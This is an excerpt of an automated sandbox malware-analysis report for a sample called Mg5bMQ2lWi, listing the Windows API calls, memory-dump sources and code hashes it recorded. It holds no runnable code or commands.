                                                                                                            • GetModuleHandleA.KERNEL32(kernel32.dll,GetDiskFreeSpaceExA,00000000,00455467), ref: 00455358
                                                                                                            • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0045535E
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AddressHandleModuleProc
                                                                                                            • String ID: GetDiskFreeSpaceExA$kernel32.dll
                                                                                                            • API String ID: 1646373207-3712701948
                                                                                                            • Opcode ID: 272051455b5cb91d1d868c6395d7d8b05e26e0b6de4e27da94085abeb1e9e08c
                                                                                                            • Instruction ID: 60eca4a99d751df3d3374a87c4cbf3116f086dd8a9115ea48f17d057e3f27308
                                                                                                            • Opcode Fuzzy Hash: 272051455b5cb91d1d868c6395d7d8b05e26e0b6de4e27da94085abeb1e9e08c
                                                                                                            • Instruction Fuzzy Hash: 0741A331A00649AFCF01EFA5D892AEFB7B8EF49305F504566F800F7252D67C5D088B69
                                                                                                            APIs
                                                                                                            • IsIconic.USER32(?), ref: 00417D1F
                                                                                                            • SetWindowPos.USER32(?,00000000,?,?,?,?,00000014,?), ref: 00417D3D
                                                                                                            • GetWindowPlacement.USER32(?,0000002C), ref: 00417D73
                                                                                                            • SetWindowPlacement.USER32(?,0000002C,?,0000002C), ref: 00417D9A
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Window$Placement$Iconic
                                                                                                            • String ID: ,
                                                                                                            • API String ID: 568898626-3772416878
                                                                                                            • Opcode ID: 26b47a840ef5862fe313a436c6949d2016bb3e60c65edf9f9fab0a84da756b7f
                                                                                                            • Instruction ID: 117db6d3727d0f94901dea8748b8d47281c3d2add8a8e77c7f929e434730b1f7
                                                                                                            • Opcode Fuzzy Hash: 26b47a840ef5862fe313a436c6949d2016bb3e60c65edf9f9fab0a84da756b7f
                                                                                                            • Instruction Fuzzy Hash: 41213171604208ABCF40EF69E8C0EEA77B8AF49314F05456AFD18DF246C678DD84CB68
                                                                                                            APIs
                                                                                                            • SetErrorMode.KERNEL32(00000001,00000000,004635C1), ref: 00463435
                                                                                                            • FindFirstFileA.KERNEL32(00000000,?,00000000,00463594,?,00000001,00000000,004635C1), ref: 004634C4
                                                                                                            • FindNextFileA.KERNEL32(000000FF,?,00000000,00463576,?,00000000,?,00000000,00463594,?,00000001,00000000,004635C1), ref: 00463556
                                                                                                            • FindClose.KERNEL32(000000FF,0046357D,00463576,?,00000000,?,00000000,00463594,?,00000001,00000000,004635C1), ref: 00463570
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Find$File$CloseErrorFirstModeNext
                                                                                                            • String ID:
                                                                                                            • API String ID: 4011626565-0
                                                                                                            • Opcode ID: e49648f109a0a58d0dd59af0c8e0b33ee568661d64b452756319b7b75e20b746
                                                                                                            • Instruction ID: c18d1c41accea68cb41f5c12e74b437797437286b731c7b532b71dbbd74da020
                                                                                                            • Opcode Fuzzy Hash: e49648f109a0a58d0dd59af0c8e0b33ee568661d64b452756319b7b75e20b746
                                                                                                            • Instruction Fuzzy Hash: 7141C870A00658AFCB11EF65CC55ADEB7B8EB88309F4044BAF404A7391E73C9F448E59
                                                                                                            APIs
                                                                                                            • SetErrorMode.KERNEL32(00000001,00000000,00463A67), ref: 004638F5
                                                                                                            • FindFirstFileA.KERNEL32(00000000,?,00000000,00463A32,?,00000001,00000000,00463A67), ref: 0046393B
                                                                                                            • FindNextFileA.KERNEL32(000000FF,?,00000000,00463A14,?,00000000,?,00000000,00463A32,?,00000001,00000000,00463A67), ref: 004639F0
                                                                                                            • FindClose.KERNEL32(000000FF,00463A1B,00463A14,?,00000000,?,00000000,00463A32,?,00000001,00000000,00463A67), ref: 00463A0E
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Find$File$CloseErrorFirstModeNext
                                                                                                            • String ID:
                                                                                                            • API String ID: 4011626565-0
                                                                                                            • Opcode ID: 9717836182e89b8284e108105af98bb591f0e4e25fd179eca548328e5960a9af
                                                                                                            • Instruction ID: a32f7eebc160b2c926ffd988aba38ac49d653b749f4bb5a92982eb88da04d6a0
                                                                                                            • Opcode Fuzzy Hash: 9717836182e89b8284e108105af98bb591f0e4e25fd179eca548328e5960a9af
                                                                                                            • Instruction Fuzzy Hash: B6418175A00A58DBCB10EFA5DC859DEB7B8EB88305F4044AAF804E7341EB78DF458E49
                                                                                                            APIs
                                                                                                            • CreateFileA.KERNEL32(00000000,C0000000,00000001,00000000,00000003,02000000,00000000,?,?,?,?,0045259F,00000000,004525C0), ref: 0042E7CA
                                                                                                            • DeviceIoControl.KERNEL32(00000000,0009C040,?,00000002,00000000,00000000,?,00000000), ref: 0042E7F5
                                                                                                            • GetLastError.KERNEL32(00000000,C0000000,00000001,00000000,00000003,02000000,00000000,?,?,?,?,0045259F,00000000,004525C0), ref: 0042E802
                                                                                                            • CloseHandle.KERNEL32(00000000,00000000,C0000000,00000001,00000000,00000003,02000000,00000000,?,?,?,?,0045259F,00000000,004525C0), ref: 0042E80A
                                                                                                            • SetLastError.KERNEL32(00000000,00000000,00000000,C0000000,00000001,00000000,00000003,02000000,00000000,?,?,?,?,0045259F,00000000,004525C0), ref: 0042E810
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ErrorLast$CloseControlCreateDeviceFileHandle
                                                                                                            • String ID:
                                                                                                            • API String ID: 1177325624-0
                                                                                                            • Opcode ID: e445e4d3b540bec23f5d4472a545cd66e54ba2727ac284448d8f04acb6f91a05
                                                                                                            • Instruction ID: 97181128065a238999caafd211b152b701c4b4b5d95cf39bc3f304bf3469fa68
                                                                                                            • Opcode Fuzzy Hash: e445e4d3b540bec23f5d4472a545cd66e54ba2727ac284448d8f04acb6f91a05
                                                                                                            • Instruction Fuzzy Hash: 4FF0F0713917203AF620B17A6C82F7B018CCB85F68F10823ABB04FF1C1D9A84C06066D
                                                                                                            APIs
                                                                                                            • IsIconic.USER32(?), ref: 00481CEE
                                                                                                            • GetWindowLongA.USER32(00000000,000000F0), ref: 00481D0C
                                                                                                            • ShowWindow.USER32(00000000,00000005,00000000,000000F0,0049B050,0048140A,0048143E,00000000,0048145E,?,?,00000001,0049B050), ref: 00481D2E
                                                                                                            • ShowWindow.USER32(00000000,00000000,00000000,000000F0,0049B050,0048140A,0048143E,00000000,0048145E,?,?,00000001,0049B050), ref: 00481D42
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Window$Show$IconicLong
                                                                                                            • String ID:
                                                                                                            • API String ID: 2754861897-0
                                                                                                            • Opcode ID: c69467129eacf3a94fb6d098dc0e524b237b2cf8676cbdccd17621b53cbb6cc5
                                                                                                            • Instruction ID: bd4bfa8a532e55613b66c26f3878df869b3cba8388d9d733fde35ddb9b3db323
                                                                                                            • Opcode Fuzzy Hash: c69467129eacf3a94fb6d098dc0e524b237b2cf8676cbdccd17621b53cbb6cc5
                                                                                                            • Instruction Fuzzy Hash: F50171302402455AD700B72A9D45B5F23D8AB17308F08093BBC51DF6B3DBADAC52974C
                                                                                                            APIs
                                                                                                            • FindFirstFileA.KERNEL32(00000000,?,00000000,00461F4C), ref: 00461ED0
                                                                                                            • FindNextFileA.KERNEL32(000000FF,?,00000000,00461F2C,?,00000000,?,00000000,00461F4C), ref: 00461F0C
                                                                                                            • FindClose.KERNEL32(000000FF,00461F33,00461F2C,?,00000000,?,00000000,00461F4C), ref: 00461F26
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Find$File$CloseFirstNext
                                                                                                            • String ID:
                                                                                                            • API String ID: 3541575487-0
                                                                                                            • Opcode ID: 1a673c2b66217e2f20547520184ec98711dcfa8b7e2b2042291a9693f5272520
                                                                                                            • Instruction ID: db92842bd19ae7c5582670e9e06bbe606287ea98b9da9161f37068fcc8ef57ce
                                                                                                            • Opcode Fuzzy Hash: 1a673c2b66217e2f20547520184ec98711dcfa8b7e2b2042291a9693f5272520
                                                                                                            • Instruction Fuzzy Hash: 9C21D831A047086ECB15EB65CC41ADEBBBCDB49304F5484F7B808E31B1E7389E45CA5A
                                                                                                            APIs
                                                                                                            • IsIconic.USER32(?), ref: 004241F4
                                                                                                            • SetActiveWindow.USER32(?,?,?,0046BD86), ref: 00424201
                                                                                                              • Part of subcall function 0042365C: ShowWindow.USER32(00410660,00000009,?,00000000,0041EDB4,0042394A,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C1C), ref: 00423677
                                                                                                              • Part of subcall function 00423B24: SetWindowPos.USER32(00000000,000000FF,00000000,00000000,00000000,00000000,00000013,?,021325AC,0042421A,?,?,?,0046BD86), ref: 00423B5F
                                                                                                            • SetFocus.USER32(00000000,?,?,?,0046BD86), ref: 0042422E
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Window$ActiveFocusIconicShow
                                                                                                            • String ID:
                                                                                                            • API String ID: 649377781-0
                                                                                                            • Opcode ID: ed84ae51c3243303549a7701ee85abab7e493b259ddab68dfc4eb862261256dd
                                                                                                            • Instruction ID: b114ffa8fbe078055c417a305beb0b6e8983b6333d82b3c601511fe05fbe2975
                                                                                                            • Opcode Fuzzy Hash: ed84ae51c3243303549a7701ee85abab7e493b259ddab68dfc4eb862261256dd
                                                                                                            • Instruction Fuzzy Hash: 07F03A717001208BCB10EFAA98C4B9662A8EF48344B5500BBBC09DF34BCA7CDC0187A8
                                                                                                            APIs
                                                                                                            • IsIconic.USER32(?), ref: 00417D1F
                                                                                                            • SetWindowPos.USER32(?,00000000,?,?,?,?,00000014,?), ref: 00417D3D
                                                                                                            • GetWindowPlacement.USER32(?,0000002C), ref: 00417D73
                                                                                                            • SetWindowPlacement.USER32(?,0000002C,?,0000002C), ref: 00417D9A
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Window$Placement$Iconic
                                                                                                            • String ID:
                                                                                                            • API String ID: 568898626-0
                                                                                                            • Opcode ID: 78b183ff173bcf850c00c3571251db26553f1d4c2e21dbadcd3fc230454a4dd4
                                                                                                            • Instruction ID: b3485382f52430a3de90e88073d2477855dbbaeb9eeee9907b508ce44eeb6dab
                                                                                                            • Opcode Fuzzy Hash: 78b183ff173bcf850c00c3571251db26553f1d4c2e21dbadcd3fc230454a4dd4
                                                                                                            • Instruction Fuzzy Hash: 02017C31204108ABDB10EE69E8C1EEA73A8AF45324F054567FD08CF242D639ECC087A8
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CaptureIconic
                                                                                                            • String ID:
                                                                                                            • API String ID: 2277910766-0
                                                                                                            • Opcode ID: da7d7cf270f73b88fe6686235f1bf383b0466356a3000177edae3a378d650de6
                                                                                                            • Instruction ID: 1c917faadd476c588bdf1ff4a00e1594475ac94e71cf422183988d33397b9b13
                                                                                                            • Opcode Fuzzy Hash: da7d7cf270f73b88fe6686235f1bf383b0466356a3000177edae3a378d650de6
                                                                                                            • Instruction Fuzzy Hash: 85F04F32304A028BDB21A72EC885AEB62F59F84368B14443FE415CB765EB7CDCD58758
                                                                                                            APIs
                                                                                                            • IsIconic.USER32(?), ref: 004241AB
                                                                                                              • Part of subcall function 00423A94: EnumWindows.USER32(00423A2C), ref: 00423AB8
                                                                                                              • Part of subcall function 00423A94: GetWindow.USER32(?,00000003), ref: 00423ACD
                                                                                                              • Part of subcall function 00423A94: GetWindowLongA.USER32(?,000000EC), ref: 00423ADC
                                                                                                              • Part of subcall function 00423A94: SetWindowPos.USER32(00000000,lAB,00000000,00000000,00000000,00000000,00000013,?,000000EC,?,?,?,004241BB,?,?,00423D83), ref: 00423B12
                                                                                                            • SetActiveWindow.USER32(?,?,?,00423D83,00000000,0042416C), ref: 004241BF
                                                                                                              • Part of subcall function 0042365C: ShowWindow.USER32(00410660,00000009,?,00000000,0041EDB4,0042394A,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C1C), ref: 00423677
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Window$ActiveEnumIconicLongShowWindows
                                                                                                            • String ID:
                                                                                                            • API String ID: 2671590913-0
                                                                                                            • Opcode ID: 548c1371db5ef4c0c17b9a522ca0bf08e6ca127860c871a9e63ea88f43f493a6
                                                                                                            • Instruction ID: ffd443eaca36288e12b0fd3e34cf0737071334a0f5e631569de285e60205db71
                                                                                                            • Opcode Fuzzy Hash: 548c1371db5ef4c0c17b9a522ca0bf08e6ca127860c871a9e63ea88f43f493a6
                                                                                                            • Instruction Fuzzy Hash: 02E0E5A470010187EF00EFAAD8C9B9662A9AB48304F55057ABC08CF24BDA78C954C724
                                                                                                            APIs
                                                                                                            • NtdllDefWindowProc_A.USER32(?,?,?,?,00000000,004127E5), ref: 004127D3
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: NtdllProc_Window
                                                                                                            • String ID:
                                                                                                            • API String ID: 4255912815-0
                                                                                                            • Opcode ID: b965a0132ad26a56d58156bb8aa5a4c51339e286f8ae4d564bc11b0873dfe01e
                                                                                                            • Instruction ID: b8ba5a3252dd9dd8755954997f8cc70cf1688dd1015ecfd52c1097a8d2c67521
                                                                                                            • Opcode Fuzzy Hash: b965a0132ad26a56d58156bb8aa5a4c51339e286f8ae4d564bc11b0873dfe01e
                                                                                                            • Instruction Fuzzy Hash: 995106316082058FC710DB6AD681A9BF3E5FF98304B2482BBD854C7392D7B8EDA1C759
                                                                                                            APIs
                                                                                                            • NtdllDefWindowProc_A.USER32(?,?,?,?), ref: 004776B6
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: NtdllProc_Window
                                                                                                            • String ID:
                                                                                                            • API String ID: 4255912815-0
                                                                                                            • Opcode ID: 98c4159c357ba624018b5095eca27885fab0bd25fe2865ee120464a1d56055ca
                                                                                                            • Instruction ID: 23eb90ac0865fb6649058132ab0dcd5e2738ee5152c03834e0ad15106694cca9
                                                                                                            • Opcode Fuzzy Hash: 98c4159c357ba624018b5095eca27885fab0bd25fe2865ee120464a1d56055ca
                                                                                                            • Instruction Fuzzy Hash: B4412775608505EFCB10CF9DC6808AABBF5FB48320BB5C996E848DB719D338EE419B54
                                                                                                            APIs
                                                                                                            • ArcFourCrypt._ISCRYPT(?,?,?,?), ref: 0045C967
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CryptFour
                                                                                                            • String ID:
                                                                                                            • API String ID: 2153018856-0
                                                                                                            • Opcode ID: 652ca7e95d520f478db864d31e1c50fd1cbe8d8ffee6081fd2562b398a9281da
                                                                                                            • Instruction ID: 196b54fe7aa8ab1053afe2cffafcf6ed6da51dc24599f2bb869cb02721a3a021
                                                                                                            • Opcode Fuzzy Hash: 652ca7e95d520f478db864d31e1c50fd1cbe8d8ffee6081fd2562b398a9281da
                                                                                                            • Instruction Fuzzy Hash: 7EC09BF240420CBF65005795FCC9C77F75CE65C6647408126F60442101D671AC1045B4
                                                                                                            APIs
                                                                                                            • ArcFourCrypt._ISCRYPT(?,00000000,00000000,000003E8,0046CB48,?,0046CD29), ref: 0045C97A
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CryptFour
                                                                                                            • String ID:
                                                                                                            • API String ID: 2153018856-0
                                                                                                            • Opcode ID: 94da5b28650a6231c2ea90e9e727fe7b396b15a16109e44d83a51c1f6f4de3e0
                                                                                                            • Instruction ID: f930510039fdc8c4d2d2d599ed284be9893e60875d5d975e013ee6f81a6adef0
                                                                                                            • Opcode Fuzzy Hash: 94da5b28650a6231c2ea90e9e727fe7b396b15a16109e44d83a51c1f6f4de3e0
                                                                                                            • Instruction Fuzzy Hash: E8A002B0E80300BAFD3057706E0EF37252CD7D4F01F208465B211A91D4C6A46404857C
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.2945315188.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.2945299426.0000000010000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2945331467.0000000010002000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_10000000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 550b9f88123d0c3b213a5d4b99e682963a3eaac5120c60ac7846f9a0f3bba5ba
                                                                                                            • Instruction ID: 1c94840b05858ddf3503627acbaac9226f9c4a6e1659969bf0a936c2f155f8a0
                                                                                                            • Opcode Fuzzy Hash: 550b9f88123d0c3b213a5d4b99e682963a3eaac5120c60ac7846f9a0f3bba5ba
